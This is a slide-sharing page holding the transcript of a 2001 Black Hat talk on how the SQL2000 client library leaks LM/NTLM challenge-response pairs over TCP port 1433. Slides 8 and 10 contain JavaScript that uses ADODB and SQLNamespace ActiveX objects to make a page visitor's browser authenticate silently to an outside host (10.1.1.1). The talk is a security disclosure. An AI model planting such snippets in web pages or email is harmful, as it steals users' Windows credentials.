Download
grabbin creds forcing sql libs to deliver lm nt challenge and response on the back channel n.
Skip this Video
Loading SlideShow in 5 Seconds..
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel… PowerPoint Presentation
Download Presentation
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

87 Vues Download Presentation
Télécharger la présentation

Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Grabbin’ Creds:Forcing SQL libs to deliver LM/NT challenge and response on the back channel… Timothy M. Mullen AnchorIS.Com, Inc. thor@hammerofgod.com Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  2. The Culprit:SQL2000 Super Sockets Lib • New functions in dbnetlib.dll! • Supports TCP/IP Sockets, encryption, authentication, etc. • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  3. Backgrounders… • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts) • Integrated Authentication (NTLM Creds) needed Named Pipes • Named Pipes required 139/445 open to authenticating system. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  4. Backgrounders… cont. • Integrated Authentication has _always_ been the recommended configuration. • 139/445 has long been blocked at the router (if not, you are a yum-yum.) • Many server-to-server apps authenticate over TCP 1433 because it is “safe” . Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  5. The Skinny • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433. • The LM/NTLM challenge/response pairs can now be sent out via 1433 (other other ports if changed) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  6. The Problem • Many routers, though specifically blocking 139/445, still allow established traffic out- I.e. 1433 outbound is free to pass. • Many have 1433 explicitly open for application support, server-to-server queries, etc. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  7. The Sting • Client side ODBC connections can specify the target server, authentication type, and the library to use. • Web sites can request client to perform ADODB recordset requests, as well as other tasks. • HTML email as well. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  8. Somewhat Lame Example • Web site with following tag: { conn=new ActiveXObject("ADODB.Connection"); conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib'; conn.Open(); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  9. Example Cont… • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box. • Easily engineered around… Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  10. Not So Lame Example • Lets try this one: { ns = new ActiveXObject("SQLNS.SQLNamespace"); ns.Initialize ("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll"); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  11. What’s the difference? • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ ! • Silently grab the creds for fun and profit! Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  12. Live Demo • Don’t try this at home! Professional driver on closed course. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  13. Thanks! AnchorIS.Com www.anchoris.com HammerofGod www.hammerofgod.com Timothy M. Mullen tmullen@anchoris.com thor@hammerofgod.com Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001